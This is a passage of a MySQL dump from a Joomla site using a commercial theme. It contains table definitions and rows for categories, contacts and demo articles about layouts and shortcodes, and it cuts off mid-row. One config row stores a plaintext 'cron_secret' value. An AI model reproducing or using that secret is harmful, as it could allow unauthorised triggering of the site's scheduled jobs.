  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access` int(10) UNSIGNED DEFAULT NULL,
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'The meta description for the page.',
  `metakey` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'The meta keywords for the page.',
  `metadata` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'JSON encoded metadata properties.',
  `created_user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `version` int(10) UNSIGNED NOT NULL DEFAULT '1'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_categories`
--

INSERT INTO `y57u5_categories` (`id`, `asset_id`, `parent_id`, `lft`, `rgt`, `level`, `path`, `extension`, `title`, `alias`, `note`, `description`, `published`, `checked_out`, `checked_out_time`, `access`, `params`, `metadesc`, `metakey`, `metadata`, `created_user_id`, `created_time`, `modified_user_id`, `modified_time`, `hits`, `language`, `version`) VALUES
(1, 0, 0, 0, 47, 0, '', 'system', 'ROOT', 'root', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{}', '', '', '', 196, '2009-10-18 16:07:09', 0, '0000-00-00 00:00:00', 0, '*', 1),
(2, 27, 1, 1, 2, 1, 'features', 'com_content', 'Features', 'features', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2010-06-28 13:26:37', 42, '2012-04-02 13:20:58', 0, '*', 1),
(3, 28, 1, 3, 4, 1, 'uncategorised', 'com_banners', 'Uncategorised', 'uncategorised', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}', '', '', '{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}', 196, '2010-06-28 13:27:35', 0, '0000-00-00 00:00:00', 0, '*', 1),
(4, 29, 1, 5, 6, 1, 'uncategorised', 'com_contact', 'Uncategorised', 'uncategorised', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"target\":\"\",\"image\":\"\"}', '', '', '{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}', 196, '2010-06-28 13:27:57', 0, '0000-00-00 00:00:00', 0, '*', 1),
(5, 30, 1, 7, 8, 1, 'uncategorised', 'com_newsfeeds', 'Uncategorised', 'uncategorised', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"target\":\"\",\"image\":\"\"}', '', '', '{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}', 196, '2010-06-28 13:28:15', 0, '0000-00-00 00:00:00', 0, '*', 1),
(7, 32, 1, 9, 10, 1, 'blog', 'com_content', 'Blog', 'blog', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2011-05-02 11:42:21', 0, '0000-00-00 00:00:00', 0, '*', 1),
(8, 56, 1, 11, 12, 1, 'contacts', 'com_contact', 'Contacts', 'contacts', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2011-11-18 16:32:10', 42, '2011-11-18 16:32:13', 0, '*', 1),
(19, 74, 1, 13, 16, 1, 'demo', 'com_content', 'Demo', 'demo', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2012-03-30 13:18:34', 0, '0000-00-00 00:00:00', 0, '*', 1),
(20, 80, 19, 14, 15, 2, 'demo/pages', 'com_content', 'Pages', 'pages', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2012-03-30 14:57:15', 0, '0000-00-00 00:00:00', 0, '*', 1),
(22, 102, 1, 17, 18, 1, 'joomla', 'com_content', 'Joomla', 'joomla', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2012-04-06 08:06:16', 0, '0000-00-00 00:00:00', 10, '*', 1),
(23, 104, 1, 19, 20, 1, 'testimonials', 'com_content', 'Testimonials', 'testimonials', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2012-04-13 14:03:19', 0, '0000-00-00 00:00:00', 0, '*', 1),
(26, 137, 1, 21, 22, 1, 'slides', 'com_content', 'Slides', 'slides', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2012-08-29 07:42:52', 0, '0000-00-00 00:00:00', 0, '*', 1),
(27, 142, 1, 23, 24, 1, 'portfolio', 'com_content', 'Portfolio', 'portfolio', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2012-08-30 13:19:31', 42, '2014-07-26 08:55:20', 0, '*', 1),
(28, 149, 1, 25, 26, 1, 'quotes', 'com_content', 'Quotes', 'quotes', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2012-08-31 11:18:15', 0, '0000-00-00 00:00:00', 0, '*', 1),
(29, 157, 1, 27, 28, 1, 'general', 'com_content', 'You are Welcome', 'general', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2012-09-15 08:13:59', 196, '2017-08-12 19:13:37', 65, '*', 1),
(30, 162, 1, 29, 30, 1, 'default', 'com_jevents', 'Default', 'default', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\",\"catcolour\":\"#CC6600\",\"overlaps\":\"0\",\"admin\":\"42\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2012-09-18 12:47:06', 42, '2014-07-16 21:28:39', 0, '*', 1),
(31, 163, 1, 31, 32, 1, 'tabs', 'com_content', 'Tabs', 'tabs', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2012-10-11 13:26:23', 0, '0000-00-00 00:00:00', 0, '*', 1),
(32, 168, 1, 33, 34, 1, 'sermons', 'com_content', 'Sermons', 'sermons', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2012-10-12 12:05:34', 0, '0000-00-00 00:00:00', 0, '*', 1),
(33, 178, 1, 35, 36, 1, 'envato', 'com_banners', 'envato', 'envato', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2013-06-20 07:12:59', 0, '0000-00-00 00:00:00', 0, '*', 1),
(34, 289, 1, 37, 38, 1, 'basic', 'com_rokcandy', 'Basic', 'basic', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-08-07 12:26:21', 0, '0000-00-00 00:00:00', 0, '', 1),
(35, 290, 1, 39, 40, 1, 'typography', 'com_rokcandy', 'Typography', 'typography', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-08-07 12:26:21', 0, '0000-00-00 00:00:00', 0, '', 1),
(36, 291, 1, 41, 42, 1, 'uncategorised', 'com_rokcandy', 'Uncategorised', 'uncategorised', '', '', 1, 0, '0000-00-00 00:00:00', 1, '', '', '', '', 196, '2014-08-07 12:26:21', 0, '0000-00-00 00:00:00', 0, '', 1),
(37, 314, 1, 43, 44, 1, 'loic', 'com_content', 'loic', 'loic', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2016-11-03 12:28:21', 0, '2016-11-03 12:28:21', 0, '*', 1),
(38, 348, 1, 45, 46, 1, 'loic', 'com_jevents', 'LOIC', 'loic', '', '', 1, 0, '0000-00-00 00:00:00', 1, '{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\",\"catcolour\":\"#b80000\",\"overlaps\":\"0\",\"admin\":\"196\"}', '', '', '{\"author\":\"\",\"robots\":\"\"}', 196, '2017-01-01 10:02:02', 196, '2017-01-01 10:25:30', 0, '*', 1);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_cjlib_config`
--

CREATE TABLE `y57u5_cjlib_config` (
  `config_name` varchar(255) NOT NULL,
  `config_value` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_cjlib_config`
--

INSERT INTO `y57u5_cjlib_config` (`config_name`, `config_value`) VALUES
('cron_secret', 'mz6ruVne5TnjxZur'),
('manual_cron', '1'),
('cron_emails', '60'),
('cron_delay', '10');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_contact_details`
--

CREATE TABLE `y57u5_contact_details` (
  `id` int(11) NOT NULL,
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL,
  `con_position` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `address` mediumtext COLLATE utf8mb4_unicode_ci,
  `suburb` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `state` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `country` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `postcode` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `telephone` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `fax` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `misc` longtext COLLATE utf8mb4_unicode_ci,
  `image` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `email_to` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `default_con` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '0',
  `access` int(10) UNSIGNED DEFAULT NULL,
  `mobile` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `webpage` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname1` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname2` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname3` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `language` varchar(7) COLLATE utf8mb4_unicode_ci NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadata` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `featured` tinyint(3) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.',
  `xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'A reference to enable linkages to external data sets.',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `version` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `hits` int(10) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_contact_details`
--

INSERT INTO `y57u5_contact_details` (`id`, `name`, `alias`, `con_position`, `address`, `suburb`, `state`, `country`, `postcode`, `telephone`, `fax`, `misc`, `image`, `email_to`, `default_con`, `published`, `checked_out`, `checked_out_time`, `ordering`, `params`, `user_id`, `catid`, `access`, `mobile`, `webpage`, `sortname1`, `sortname2`, `sortname3`, `language`, `created`, `created_by`, `created_by_alias`, `modified`, `modified_by`, `metakey`, `metadesc`, `metadata`, `featured`, `xreference`, `publish_up`, `publish_down`, `version`, `hits`) VALUES
(1, 'John Q. Public', 'john-q-public', 'Chief Information Officer', '1 Infinite Loop', 'Cupertino', 'California', 'USA', '95014', '1-212-555555-1', '1-212-555555-2', '<p>Lorem ipsum dolor sit amet, consetetur sadipscing elitr.</p>', '', 'noreply@arrowthemes.com', 0, 1, 0, '0000-00-00 00:00:00', 1, '{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"0\",\"show_position\":\"0\",\"show_email\":\"0\",\"show_street_address\":\"0\",\"show_suburb\":\"0\",\"show_state\":\"0\",\"show_postcode\":\"0\",\"show_country\":\"0\",\"show_telephone\":\"0\",\"show_mobile\":\"0\",\"show_fax\":\"0\",\"show_webpage\":\"0\",\"show_misc\":\"0\",\"show_image\":\"0\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linka\":null,\"linkb_name\":\"\",\"linkb\":null,\"linkc_name\":\"\",\"linkc\":null,\"linkd_name\":\"\",\"linkd\":null,\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}', 0, 8, 1, '', '', '', '', '', '*', '2011-11-18 16:33:47', 196, '', '2012-04-08 18:14:05', 42, '', '', '{\"robots\":\"\",\"rights\":\"\"}', 0, '', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 3523),
(2, 'Jane Q. Public', 'jane-q-public', 'Chief Information Officer', '1 Infinite Loop', 'Cupertino', 'California', 'USA', '95014', '1-212-555555-1', '1-212-555555-2', '<p>Lorem ipsum dolor sit amet, consetetur sadipscing elitr.</p>', '', 'noreply@arrowthemes.com', 0, 1, 0, '0000-00-00 00:00:00', 2, '{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":null,\"linkb_name\":\"\",\"linkb\":null,\"linkc_name\":\"\",\"linkc\":null,\"linkd_name\":\"\",\"linkd\":null,\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}', 0, 8, 1, '', '', '', '', '', '*', '2011-11-18 16:35:05', 196, '', '2012-04-08 18:12:36', 42, '', '', '{\"robots\":\"\",\"rights\":\"\"}', 0, '', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 22),
(3, 'Dream Centre Headquarters', 'dream-centre-headquarters', '', '', '', '', '', '', '', '', '', '', '', 0, 1, 0, '0000-00-00 00:00:00', 3, '{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_tags\":\"\",\"show_info\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"add_mailto_link\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_image\":\"\",\"show_misc\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"articles_display_num\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":false,\"linkb_name\":\"\",\"linkb\":false,\"linkc_name\":\"\",\"linkc\":false,\"linkd_name\":\"\",\"linkd\":false,\"linke_name\":\"\",\"linke\":false,\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}', 0, 4, 1, '', '', '', '', '', '*', '2017-09-01 16:32:01', 196, '', '2017-09-01 16:32:01', 0, '', '', '{\"robots\":\"\",\"rights\":\"\"}', 0, '', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 5);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_content`
--

CREATE TABLE `y57u5_content` (
  `id` int(10) UNSIGNED NOT NULL,
  `asset_id` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `introtext` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `fulltext` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `catid` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `urls` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `attribs` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `access` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `hits` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `metadata` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `featured` tinyint(3) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The language code for the article.',
  `xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_content`
--

INSERT INTO `y57u5_content` (`id`, `asset_id`, `title`, `alias`, `introtext`, `fulltext`, `state`, `catid`, `created`, `created_by`, `created_by_alias`, `modified`, `modified_by`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `images`, `urls`, `attribs`, `version`, `ordering`, `metakey`, `metadesc`, `access`, `hits`, `metadata`, `featured`, `language`, `xreference`, `note`) VALUES
(1, 33, 'Module Layouts', 'module-layouts', '<p class=\"dropcap\">Warp framework comes with a robust layout system to create any kind of sidebar or widget layout. You can easily manage the sidebar\'s positions and widths in the theme administration. Module layouts can have different styles and be placed in any position offered by this theme.</p>\r\n\r\n<p>Each position has its own layout. You can align module layouts side-by-side, stack them or choose your own grid layout. The grid adapts perfectly to your layout even on smaller devices.</p>\r\n\r\n<div class=\"uk-text-center\">\r\n  <img src=\"images/demo/features/features_layouts.png\" alt=\"Layouts\" width=\"670\" height=\"870\"/>\r\n</div>\r\n\r\n<p>[badge style=\"danger\"]important[/badge]\r\n  There are other module positions which are hidden by default, namely:\r\n</p>\r\n\r\n  [list style=\"uk-list-striped\"]\r\n   [li]<code>off-canvas</code> - Appears on the left to show the mobile menu. It can used to also place other modules[/li]\r\n   [li]<code>reveal-a</code>, <code>reveal-b</code> and <code>reveal-c</code> - shows a module in a popup dialog box. See <a href=\"index.php?option=com_content&view=article&id=13&Itemid=213\">this page</a> for more information[/li]\r\n  [li]<code>mega-menu</code> - You can use this position to add a third-party menu[/li]\r\n[/list]\r\n', '', 1, 2, '2011-05-02 11:45:23', 196, '', '2014-08-05 14:31:11', 42, 0, '0000-00-00 00:00:00', '2011-05-02 11:45:23', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 6, 17, '', '', 1, 1459, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(4, 36, 'Shortcodes', 'shortcodes', '<p>[dropcap] You can create some beautiful content by using some simple HTML elements. Lighthouse theme offers some neat styles for all HTML elements and a great set of CSS classes to style your content. Basic HTML is very easy to learn and this small guide shows you how to use all styles using rokCandy shortcodes.[/dropcap]</p>\r\n<p>[h2 dotted] <strong>Basic</strong> HTML Elements [/h2]</p>\r\n<p>Here is a short demonstration of text-level semanticts. The &lt;p&gt; element creates a new paragraph. It will have some space before and after itself. To turn your text into hypertext just use the <a href=\"#\">&lt;a&gt; element</a>.</p>\r\n<p>[row][column one-half]</p>\r\n<h1>This is an H1 Heading</h1>\r\n<h2>This is an H2 Heading</h2>\r\n<h3>This is an H3 Heading</h3>\r\n<h4>This is an H4 Heading</h4>\r\n<h5>This is an H5 Heading</h5>\r\n<h6>This is an H6 Heading</h6>\r\n<p>[/column]</p>\r\n<p>[column one-half]</p>\r\n<h1 class=\"dotted\"><strong>H1</strong> with a dotted line</h1>\r\n<h2 class=\"dotted\"><strong>H2</strong> with a dotted line</h2>\r\n<h3 class=\"dotted\"><strong>H3</strong> with a dotted line</h3>\r\n<h4 class=\"dotted\"><strong>H4</strong> with a dotted line</h4>\r\n<h5 class=\"dotted\"><strong>H5</strong> with a dotted line</h5>\r\n<h6 class=\"dotted\"><strong>H6</strong> with a dotted line</h6>\r\n<p>[/column][/row]</p>\r\n<p>[h2 dotted] <strong>Text-level</strong> semantics[/h2]</p>\r\n<p>You can emphasize text using the <em>&lt;em&gt; element</em> or to imply any extra importance the <strong>&lt;strong&gt; element</strong>. Highlight text with no semantic meaning using the [mark][<code>mark</code>] element[<code>/mark</code>][/mark]. Markup document changes like inserted or deleted text with the [del][<code>del</code>] element[<code>/del</code>][/del] or [ins][<code>ins</code>] element [<code>/ins</code>][/ins]. To define an abbreviation use the [abbr title=\"Abbreviation Element\"][<code>abbr</code>] element [<code>/abbr</code>][/abbr] and to define a definition term use the [dfn title=\"Defines a definition term\"][<code>dfn</code>] element [<code>/dfn</code>][/dfn].</p>\r\n<br/>\r\n\r\n\r\n[heading size=\"h1\" style=\"dotted\"]Lists[/heading]\r\n      <p>You can create an unordered list using the <code><i>[</i>list]</code>. The li element defines the list item. </p>\r\n      \r\n      [heading size=\"h3\" style=\"dotted uk-padding-bottom\"]Simple List[/heading]\r\n      [list]\r\n      [li]List Item 1[/li]\r\n      [li]List Item 2[/li]\r\n      [li]List Item 3[/li]\r\n      [/list]\r\n      \r\n      [badge style=\"note uk-margin-top\"]markup[/badge]\r\n      <pre><i>[</i>list]\r\n   <i>[</i>li]List Item 1<i>[</i>/li]\r\n   <i>[</i>li]List Item 2<i>[</i>/li]\r\n   <i>[</i>li]List Item 3<i>[</i>/li]\r\n<i>[</i>/list]</pre>\r\n      \r\n      <p>You can create lists with different style variations. E.g Lists with alternative stripes, lists with icons etc.</p>\r\n      \r\n      [heading size=\"h3\" style=\"dotted uk-padding-bottom\"]Lists with stripes[/heading]\r\n      [list style=\"uk-list-striped\"]\r\n      [li]List Item 1[/li]\r\n      [li]List Item 2[/li]\r\n      [li]List Item 3[/li]\r\n      [/list]\r\n\r\n      [badge style=\"note uk-margin-top\"]markup[/badge]\r\n      <pre><i>[</i>list style=\"uk-list-striped\"]\r\n   <i>[</i>li]List Item 1<i>[</i>/li]\r\n   <i>[</i>li]List Item 2<i>[</i>/li]\r\n   <i>[</i>li]List Item 3<i>[</i>/li]\r\n<i>[</i>/list]</pre>\r\n          \r\n      [heading size=\"h3\" style=\"dotted uk-padding-bottom\"]Lists with icons[/heading]\r\n      <p>Adding icons to your list, makes them even look more outstanding. Check out the entire collection of icon fonts that you can use with lists <a href=\"index.php?option=com_content&view=article&id=66&Itemid=422\">here</a></p>\r\n        \r\n      [child_grid][column size=\"1-3\"]\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-asterisk\"]Lorem ipsum dolor[/li]\r\n[li icon=\"icon-asterisk\"]consectetur adipisicing elit[/li]\r\n[li icon=\"icon-asterisk\"]sed do eiusmod tempor[/li]\r\n[/list]\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-circle-o\"]Lorem ipsum dolor[/li]\r\n[li icon=\"icon-circle-o\"]consectetur adipisicing elit[/li]\r\n[li icon=\"icon-circle-o\"]sed do eiusmod tempor[/li]\r\n[/list]\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-check-square-o\"]Lorem ipsum dolor[/li]\r\n[li icon=\"icon-check-square-o\"]consectetur adipisicing elit[/li]\r\n[li icon=\"icon-check-square-o\"]sed do eiusmod tempor[/li]\r\n[/list]\r\n[/column][/child_grid]\r\n\r\n[child_grid][column size=\"1-3\"]\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-folder-o\"]Lorem ipsum dolor[/li]\r\n[li icon=\"icon-folder-o\"]consectetur adipisicing elit[/li]\r\n[li icon=\"icon-folder-o\"]sed do eiusmod tempor[/li]\r\n[/list]\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-info-circle\"]Lorem ipsum dolor[/li]\r\n[li icon=\"icon-info-circle\"]consectetur adipisicing 